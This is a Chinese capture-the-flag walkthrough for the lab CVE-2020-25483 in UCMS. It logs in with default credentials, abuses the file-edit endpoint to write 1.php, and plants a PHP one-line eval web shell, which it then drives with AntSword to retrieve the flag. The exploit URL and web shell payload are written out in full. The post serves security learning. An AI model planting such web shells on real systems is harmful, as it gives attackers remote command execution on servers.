春秋云境CVE-2020-25483

1.阅读靶场介绍

这里得到就是文件写入

然后再读取文件

2.启动靶场

如下图所示

这里我们可以直接再url后面加上

/ucms/login.php

进入下面所示的页面

这里输入账号/密码:admin/admin

下一步就是输入如下图的url

各位可以参考参考

https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.phpw

然后在下面输入这个木马

复制代码
<?php @eval($_POST['cmd']);?>

然后访问

这个url:https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/1.php

得到的是一片空白那就是对的

3.中国蚁剑启动

输入这些参数

然后就可以找到flag了

感谢各位的观看哟

相关推荐
谪星·阿凯3 小时前
业务逻辑漏洞从入门到实战博客
网络·安全·web安全
菩提小狗3 小时前
每日安全情报报告 · 2026-04-01
网络安全·漏洞·cve·安全情报·每日安全
谪星·阿凯3 小时前
PHP序列化漏洞从入门到实战博客
android·开发语言·web安全·php
三七吃山漆4 小时前
BUUCTF[极客大挑战 2019]Http
web安全·网络安全·ctf·极客大挑战
RrEeSsEeTt4 小时前
【HackTheBox】- BoardLight 靶机学习
linux·学习·网络安全·渗透测试·kali·红队·hackthebox
以太浮标4 小时前
华为eNSP模拟器 - 设备及技术栈场景全维度解析
运维·网络·网络协议·网络安全·华为·负载均衡·信息与通信
сокол4 小时前
【网安-Web渗透测试-内网渗透】内网代理和隧道技术
windows·web安全·系统安全
上海云盾-小余4 小时前
业务频繁卡顿丢包?如何精准区分网络延迟、线路故障与 CC 攻击
网络·安全·web安全
还是做不到嘛\.15 小时前
Dvwa靶场-SQL Injection (Blind)-基于sqlmap
数据库·sql·web安全